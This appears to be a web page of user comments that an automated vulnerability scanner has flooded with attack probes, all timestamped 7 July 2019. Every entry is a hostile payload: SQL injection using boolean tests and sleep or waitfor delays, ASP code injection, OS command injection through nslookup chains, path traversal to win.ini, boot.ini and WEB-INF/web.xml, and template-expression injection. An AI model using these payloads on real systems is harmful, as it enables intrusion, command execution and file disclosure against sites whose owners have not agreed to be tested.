.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

xxiskgeh
7/7/2019 11:05:01 PM

response.write(9100652*9005129)

idpymxpl
7/7/2019 11:05:02 PM

HND8oI9m

pmhktvpm
7/7/2019 11:05:04 PM

WEB-INF/web.xml

xxiskgeh
7/7/2019 11:05:06 PM

'+response.write(9100652*9005129)+'

ebvqvbya
7/7/2019 11:05:07 PM

-1 OR 3+445-445-1=0+0+0+1 --

xxiskgeh
7/7/2019 11:05:08 PM

"+response.write(9100652*9005129)+"

ebvqvbya
7/7/2019 11:05:09 PM

-1 OR 3*2<(0+5+445-445) --

pmhktvpm
7/7/2019 11:05:11 PM

WEB-INF\web.xml

ebvqvbya
7/7/2019 11:05:13 PM

-1 OR 3*2>(0+5+445-445) --

ebvqvbya
7/7/2019 11:05:16 PM

-1 OR 2+319-319-1=0+0+0+1

nygentyh
7/7/2019 11:05:18 PM

set|set&set

idpymxpl
7/7/2019 11:05:21 PM

hQ6uf6HT

nygentyh
7/7/2019 11:05:23 PM

$(nslookup idzypCmh)

ebvqvbya
7/7/2019 11:05:25 PM

-1 OR 3+319-319-1=0+0+0+1

nygentyh
7/7/2019 11:05:27 PM

&nslookup x5Yi0k8S&'\"`0&nslookup x5Yi0k8S&`'

ebvqvbya
7/7/2019 11:05:31 PM

-1 OR 3*2<(0+5+319-319)

ebvqvbya
7/7/2019 11:05:35 PM

-1 OR 3*2>(0+5+319-319)

xxiskgeh
7/7/2019 11:05:37 PM

response.write(9754695*9108926)

ebvqvbya
7/7/2019 11:05:40 PM

-1' OR 2+780-780-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:05:43 PM

-1' OR 3+780-780-1=0+0+0+1 --

xxiskgeh
7/7/2019 11:05:44 PM

'+response.write(9754695*9108926)+'

ebvqvbya
7/7/2019 11:05:46 PM

-1' OR 3*2<(0+5+780-780) --

xxiskgeh
7/7/2019 11:05:46 PM

"+response.write(9754695*9108926)+"

ebvqvbya
7/7/2019 11:05:50 PM

-1' OR 3*2>(0+5+780-780) --

ebvqvbya
7/7/2019 11:05:57 PM

-1' OR 2+386-386-1=0+0+0+1 or 'CZbtFuW1'='

ebvqvbya
7/7/2019 11:06:03 PM

-1' OR 3+386-386-1=0+0+0+1 or 'CZbtFuW1'='

ebvqvbya
7/7/2019 11:06:05 PM

-1' OR 3*2<(0+5+386-386) or 'CZbtFuW1'='

nygentyh
7/7/2019 11:06:13 PM

set|set&set

nygentyh
7/7/2019 11:06:16 PM

$(nslookup 9rWC2xBv)

nygentyh
7/7/2019 11:06:18 PM

&nslookup YoNs2nTv&'\"`0&nslookup YoNs2nTv&`'

ebvqvbya
7/7/2019 11:06:19 PM

-1' OR 3*2>(0+5+386-386) or 'CZbtFuW1'='

ebvqvbya
7/7/2019 11:06:23 PM

-1" OR 2+566-566-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:06:25 PM

-1" OR 3+566-566-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:06:27 PM

-1" OR 3*2<(0+5+566-566) --

xxiskgeh
7/7/2019 11:06:29 PM

response.write(9441992*9994333)

ebvqvbya
7/7/2019 11:06:34 PM

-1" OR 3*2>(0+5+566-566) --

xxiskgeh
7/7/2019 11:06:37 PM

'+response.write(9441992*9994333)+'

ebvqvbya
7/7/2019 11:06:38 PM

if(now()=sysdate(),sleep(18.156),0)/*'XOR(if(now()=sysdate(),sleep(18.156),0))OR'"XOR(if(now()=sysdate(),sleep(18.156),0))OR"*/

xxiskgeh
7/7/2019 11:06:39 PM

"+response.write(9441992*9994333)+"

ebvqvbya
7/7/2019 11:06:44 PM

(select(0)from(select(sleep(27.233999999999998)))v)/*'+(select(0)from(select(sleep(27.233999999999998)))v)+'"+(select(0)from(select(sleep(27.233999999999998)))v)+"*/

ebvqvbya
7/7/2019 11:06:47 PM

1 waitfor delay '0:0:27.233999999999998' --

ebvqvbya
7/7/2019 11:06:49 PM

48GH4ZwA'; waitfor delay '0:0:27.233999999999998' --

ebvqvbya
7/7/2019 11:06:51 PM

bO4GgBoY'); waitfor delay '0:0:9.078' --

nygentyh
7/7/2019 11:06:53 PM

set|set&set

ebvqvbya
7/7/2019 11:06:56 PM

GK93a4Xr')); waitfor delay '0:0:9.078' --

nygentyh
7/7/2019 11:07:01 PM

$(nslookup 0QnHMXsG)

ebvqvbya
7/7/2019 11:07:06 PM

PSNkEKMl';select pg_sleep(9.078); --

ebvqvbya
7/7/2019 11:07:09 PM

lGnhyOxf';select pg_sleep(18.156); --

nygentyh
7/7/2019 11:07:11 PM

&nslookup lFkbVSZm&'\"`0&nslookup lFkbVSZm&`'

ebvqvbya
7/7/2019 11:07:14 PM

dDz1ZYqu');select pg_sleep(18.156); --

ebvqvbya
7/7/2019 11:07:19 PM

q6Cb6yxH'));select pg_sleep(27.233999999999998); --

xxiskgeh
7/7/2019 11:07:31 PM

response.write(9913558*9219064)

xxiskgeh
7/7/2019 11:07:35 PM

'+response.write(9913558*9219064)+'

xxiskgeh
7/7/2019 11:07:38 PM

"+response.write(9913558*9219064)+"

nygentyh
7/7/2019 11:07:48 PM

set|set&set

nygentyh
7/7/2019 11:07:50 PM

$(nslookup 7suIH57i)

nygentyh
7/7/2019 11:07:57 PM

&nslookup S8CsMUDv&'\"`0&nslookup S8CsMUDv&`'

xxiskgeh
7/7/2019 11:08:20 PM

response.write(9269452*9884886)

xxiskgeh
7/7/2019 11:08:22 PM

'+response.write(9269452*9884886)+'

xxiskgeh
7/7/2019 11:08:23 PM

"+response.write(9269452*9884886)+"

nygentyh
7/7/2019 11:08:30 PM

set|set&set

nygentyh
7/7/2019 11:08:38 PM

$(nslookup 32mbANbf)

nygentyh
7/7/2019 11:08:42 PM

&nslookup 2YI7ychT&'\"`0&nslookup 2YI7ychT&`'

pmhktvpm
7/7/2019 11:08:44 PM

../../../../../../../../../../windows/win.ini

pmhktvpm
7/7/2019 11:08:50 PM

../../../../../../../../../../boot.ini

pmhktvpm
7/7/2019 11:08:52 PM

../../../../../../../../../../windows/win.ini.jpg

pmhktvpm
7/7/2019 11:08:55 PM

������������������������������������������������windows��win.ini

pmhktvpm
7/7/2019 11:08:58 PM

................windowswin.ini

pmhktvpm
7/7/2019 11:09:03 PM

..\..\..\..\..\..\..\..\windows\win.ini

pmhktvpm
7/7/2019 11:09:07 PM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

xxiskgeh
7/7/2019 11:09:08 PM

response.write(9339728*9874381)

pmhktvpm
7/7/2019 11:09:12 PM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

xxiskgeh
7/7/2019 11:09:12 PM

'+response.write(9339728*9874381)+'

pmhktvpm
7/7/2019 11:09:15 PM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

xxiskgeh
7/7/2019 11:09:17 PM

"+response.write(9339728*9874381)+"

nygentyh
7/7/2019 11:09:18 PM

set|set&set

nygentyh
7/7/2019 11:09:19 PM

$(nslookup ZdFVPkYm)

nygentyh
7/7/2019 11:09:22 PM

&nslookup K438GFxh&'\"`0&nslookup K438GFxh&`'

pmhktvpm
7/7/2019 11:09:25 PM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

pmhktvpm
7/7/2019 11:09:31 PM

WEB-INF/web.xml

pmhktvpm
7/7/2019 11:09:34 PM

WEB-INF\web.xml

bwojtwww
7/7/2019 11:09:36 PM

${9999709+9999807}

bwojtwww
7/7/2019 11:09:53 PM

${10000270+9999010}

xxiskgeh
7/7/2019 11:10:00 PM

response.write(9743668*9713746)

xxiskgeh
7/7/2019 11:10:01 PM

'+response.write(9743668*9713746)+'

xxiskgeh
7/7/2019 11:10:03 PM

"+response.write(9743668*9713746)+"

bwojtwww
7/7/2019 11:10:06 PM

${9999787+9999477}

bwojtwww
7/7/2019 11:10:19 PM

${9999634+9999970}

nygentyh
7/7/2019 11:10:20 PM

set|set&set

nygentyh
7/7/2019 11:10:24 PM

$(nslookup eROwiIMo)

nygentyh
7/7/2019 11:10:28 PM

&nslookup XE7L1yJY&'\"`0&nslookup XE7L1yJY&`'

bwojtwww
7/7/2019 11:10:33 PM

${10000133+10000159}

bwojtwww
7/7/2019 11:11:01 PM

${9999269+9999987}

ebvqvbya
7/7/2019 11:11:02 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

ebvqvbya
7/7/2019 11:11:04 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

ebvqvbya
7/7/2019 11:11:07 PM

-1 OR 2+463-463-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:11:10 PM

-1 OR 3+463-463-1=0+0+0+1 --

bwojtwww
7/7/2019 11:11:11 PM

${10000460+9999675}

ebvqvbya
7/7/2019 11:11:15 PM

-1 OR 3*2<(0+5+463-463) --

ebvqvbya
7/7/2019 11:11:18 PM

-1 OR 3*2>(0+5+463-463) --

ebvqvbya
7/7/2019 11:11:22 PM

-1 OR 2+891-891-1=0+0+0+1

bwojtwww
7/7/2019 11:11:28 PM

${9999246+10000269}

ebvqvbya
7/7/2019 11:11:29 PM

-1 OR 3+891-891-1=0+0+0+1

ebvqvbya
7/7/2019 11:11:33 PM

-1 OR 3*2<(0+5+891-891)

ebvqvbya
7/7/2019 11:11:36 PM

-1 OR 3*2>(0+5+891-891)

ebvqvbya
7/7/2019 11:11:38 PM

-1' OR 2+943-943-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:11:41 PM

-1' OR 3+943-943-1=0+0+0+1 --

bwojtwww
7/7/2019 11:11:43 PM

${10000103+10000493}

ebvqvbya
7/7/2019 11:11:47 PM

-1' OR 3*2<(0+5+943-943) --

ebvqvbya
7/7/2019 11:11:53 PM

-1' OR 3*2>(0+5+943-943) --

ebvqvbya
7/7/2019 11:11:58 PM

-1' OR 2+364-364-1=0+0+0+1 or '3o85CULZ'='

ebvqvbya
7/7/2019 11:12:01 PM

-1' OR 3+364-364-1=0+0+0+1 or '3o85CULZ'='

ebvqvbya
7/7/2019 11:12:04 PM

-1' OR 3*2<(0+5+364-364) or '3o85CULZ'='

ebvqvbya
7/7/2019 11:12:06 PM

-1' OR 3*2>(0+5+364-364) or '3o85CULZ'='

ebvqvbya
7/7/2019 11:12:09 PM

-1" OR 2+962-962-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:12:11 PM

-1" OR 3+962-962-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:12:13 PM

-1" OR 3*2<(0+5+962-962) --

ebvqvbya
7/7/2019 11:12:17 PM

-1" OR 3*2>(0+5+962-962) --

ebvqvbya
7/7/2019 11:12:23 PM

if(now()=sysdate(),sleep(39),0)/*'XOR(if(now()=sysdate(),sleep(39),0))OR'"XOR(if(now()=sysdate(),sleep(39),0))OR"*/

ebvqvbya
7/7/2019 11:12:26 PM

(select(0)from(select(sleep(39)))v)/*'+(select(0)from(select(sleep(39)))v)+'"+(select(0)from(select(sleep(39)))v)+"*/

pmhktvpm
7/7/2019 11:12:27 PM

../../../../../../../../../../windows/win.ini

ebvqvbya
7/7/2019 11:12:27 PM

1 waitfor delay '0:0:39' --

pmhktvpm
7/7/2019 11:12:29 PM

../../../../../../../../../../boot.ini

ebvqvbya
7/7/2019 11:12:30 PM

QtCziAM5'; waitfor delay '0:0:13' --

pmhktvpm
7/7/2019 11:12:32 PM

../../../../../../../../../../windows/win.ini.jpg

pmhktvpm
7/7/2019 11:12:35 PM

������������������������������������������������windows��win.ini

ebvqvbya
7/7/2019 11:12:36 PM

8KryKxfU'); waitfor delay '0:0:13' --

ebvqvbya
7/7/2019 11:12:39 PM

dmmksBOl')); waitfor delay '0:0:13' --

ebvqvbya
7/7/2019 11:12:42 PM

YEDjuUVG';select pg_sleep(26); --

pmhktvpm
7/7/2019 11:12:43 PM

................windowswin.ini

ebvqvbya
7/7/2019 11:12:44 PM

DBGGgD7g');select pg_sleep(26); --

pmhktvpm
7/7/2019 11:12:46 PM

..\..\..\..\..\..\..\..\windows\win.ini

ebvqvbya
7/7/2019 11:12:47 PM

2L3OoPZD'));select pg_sleep(26); --

pmhktvpm
7/7/2019 11:12:49 PM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

pmhktvpm
7/7/2019 11:12:53 PM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

pmhktvpm
7/7/2019 11:12:55 PM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

pmhktvpm
7/7/2019 11:12:58 PM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\